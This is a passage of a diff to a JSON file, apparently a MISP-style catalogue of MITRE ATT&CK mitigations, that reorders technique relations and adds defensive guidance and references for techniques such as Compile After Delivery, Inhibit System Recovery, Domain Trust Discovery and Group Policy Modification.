 "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
@@ -1295,90 +1370,6 @@
 ],
 "type": "mitigates"
 },
- {
- "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
- "tags": [
- 
"estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
 {
 "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a",
 "tags": [
@@ -1387,21 +1378,7 @@
 "type": "mitigates"
 },
 {
- "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5",
+ "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1421,6 +1398,34 @@
 ],
 "type": "mitigates"
 },
+ {
+ "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
 {
 "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
 "tags": [
@@ -1429,7 +1434,7 @@
 "type": "mitigates"
 },
 {
- "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d",
+ "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1441,6 +1446,76 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "mitigates"
+ },
+ {
+ "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
 }
 ],
 "uuid": "0beabf44-e8d8-4ae4-9122-ef56369a2564",
@@ -1682,7 +1757,7 @@
 "value": "Graphical User Interface Mitigation - T1061"
 },
 {
- "description": "Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.",
+ "description": "Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.",
 "meta": {
 "external_id": "T1017",
 "refs": [
@@ -1748,7 +1823,7 @@
 "value": "Remote System Discovery Mitigation - T1018"
 },
 {
- "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities used to invoke execution.",
+ "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)",
 "meta": {
 "external_id": "T1202",
 "refs": [
@@ -1757,7 +1832,8 @@
 "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
 "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
 "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
- "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx",
+ "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39"
 ]
 },
 "related": [
@@ -1834,6 +1910,31 @@
 "uuid": "a569295c-a093-4db4-9fb4-7105edef85ad",
 "value": "Custom Cryptographic Protocol Mitigation - T1024"
 },
+ {
+ "description": "This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. 
(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1502",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1502",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "ae56a49d-5281-45c5-ab95-70a1439c338e",
+ "value": "Compile After Delivery Mitigation - T1502"
+ },
 {
 "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
 "meta": {
@@ -1972,6 +2073,32 @@
 "uuid": "ba2ec548-fb75-4b8c-88d6-d91a77a943cf",
 "value": "Windows Management Instrumentation Mitigation - T1047"
 },
+ {
+ "description": "Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. \n\nConsider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1490",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1490",
+ "https://www.ready.gov/business/implementation/IT",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "bb25b897-bfc7-4128-839d-52e9764dbfa6",
+ "value": "Inhibit System Recovery Mitigation - T1490"
+ },
 {
 "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports. 
\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)",
 "meta": {
@@ -1998,7 +2125,8 @@
 "meta": {
 "external_id": "T1075",
 "refs": [
- "https://attack.mitre.org/techniques/T1075"
+ "https://attack.mitre.org/techniques/T1075",
+ "https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml"
 ]
 },
 "related": [
@@ -2384,14 +2512,16 @@
 "value": "Network Share Discovery Mitigation - T1135"
 },
 {
- "description": "Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)\n\nFor the Office Test method, create the Registry key used to execute it and set the permissions to \"Read Control\" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)\n\nDisable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)",
+ "description": "Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)\n\nFor the Office Test method, create the Registry key used to execute it and set the permissions to \"Read Control\" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)\n\nDisable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. 
(Citation: MRWLabs Office Persistence Add-ins)\n\nFor the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)",
 "meta": {
 "external_id": "T1137",
 "refs": [
 "https://attack.mitre.org/techniques/T1137",
+ "https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/",
 "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/",
 "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/",
- "https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/"
+ "https://sensepost.com/blog/2017/outlook-forms-and-shells/",
+ "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/"
 ]
 },
 "related": [
@@ -2407,18 +2537,18 @@
 "value": "Office Application Startup Mitigation - T1137"
 },
 {
- "description": "Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)\n\nEnsure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)\n\nOn Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)",
+ "description": "Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)\n\nEnsure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)\n\nOn Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. 
(Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)",
 "meta": {
 "external_id": "T1173",
 "refs": [
 "https://attack.mitre.org/techniques/T1173",
 "https://technet.microsoft.com/library/security/4053440",
- "https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653",
 "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/",
 "https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b",
+ "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021",
+ "https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653",
 "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee",
- "https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction",
- "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021"
+ "https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction"
 ]
 },
 "related": [
@@ -2496,13 +2626,14 @@
 "value": "Spearphishing via Service Mitigation - T1194"
 },
 {
- "description": "Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.\n\nLeverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012): \n\n* Uniquely Identify Supply Chain Elements, Processes, and Actors\n* Limit Access and Exposure within the Supply Chain\n* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data\n* Share Information within Strict Limits\n* Perform SCRM Awareness and Training\n* Use Defensive Design for Systems, Elements, and Processes\n* Perform Continuous Integrator Review\n* Strengthen Delivery Mechanisms\n* Assure Sustainment Activities and Processes\n* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle",
+ "description": "Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.\n\nLeverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012): \n\n* Uniquely Identify Supply Chain Elements, Processes, and Actors\n* Limit Access and Exposure within the Supply Chain\n* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data\n* Share Information within Strict Limits\n* Perform SCRM Awareness and Training\n* Use Defensive Design for Systems, Elements, and Processes\n* Perform Continuous Integrator Review\n* Strengthen Delivery Mechanisms\n* Assure Sustainment Activities and Processes\n* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle\n\nA patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)",
 "meta": {
 "external_id": "T1195",
 "refs": [
 "https://attack.mitre.org/techniques/T1195",
 "https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf",
- "http://dx.doi.org/10.6028/NIST.IR.7622"
+ "http://dx.doi.org/10.6028/NIST.IR.7622",
+ "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf"
 ]
 },
 "related": [
@@ -2623,12 +2754,150 @@
 "value": "Compiled HTML File Mitigation - T1223"
 },
 {
- "description": "Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)\n\nUse host-based security software to block LLMNR/NetBIOS traffic.",
+ "description": "Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)",
+ "meta": {
+ "external_id": "T1482",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1482",
+ "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ "
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "159b4ee4-8fa1-44a5-b095-2973f3c7e25e",
+ "value": "Domain Trust Discovery Mitigation - T1482"
+ },
+ {
+ "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected. \n\nConsider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.",
+ "meta": {
+ "external_id": "T1492",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1492",
+ "https://www.ready.gov/business/implementation/IT"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "e9362d25-4427-446b-99e8-b8f0c3b86615",
+ "value": "Stored Data Manipulation Mitigation - T1492"
+ },
+ {
+ "description": "This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)",
+ "meta": {
+ "external_id": "T1483",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1483",
+ "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf",
+ "https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/",
+ "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html",
+ "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "3bd2cf87-1ceb-4317-9aee-3e7dc713261b",
+ "value": "Domain Generation Algorithms Mitigation - T1483"
+ },
+ {
+ "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.",
+ "meta": {
+ "external_id": "T1493",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1493"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "245075bc-f992-4d89-af8c-834c53d403f4",
+ "value": "Transmitted Data Manipulation Mitigation - T1493"
+ },
+ {
+ "description": "Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as Bloodhound (version 1.5.1 and later)(Citation: GitHub Bloodhound).\n\nConsider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)",
+ "meta": {
+ "external_id": "T1484",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1484",
+ "https://github.com/BloodHoundAD/BloodHound",
+ "https://wald0.com/?p=179",
+ "https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "2108b914-eee1-45cc-8840-36272b19596a",
+ "value": "Group Policy Modification Mitigation - T1484"
+ },
+ {
+ "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1494",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1494",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "337172b1-b003-4034-8a3f-1d89a71da628",
+ "value": "Runtime Data Manipulation Mitigation - T1494"
+ },
+ {
+ "description": "Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)\n\nUse host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)",
 "meta": {
 "external_id": "T1171",
 "refs": [
 "https://attack.mitre.org/techniques/T1171",
- "https://adsecurity.org/?p=3299"
+ "https://adsecurity.org/?p=3299",
+ "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html",
+ "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html",
+ "https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)"
 ]
 },
 "related": [
@@ -2665,7 +2934,7 @@
 "value": "Multi-Stage Channels Mitigation - T1104"
 },
 {
- "description": "Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.\n\nGrant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.",
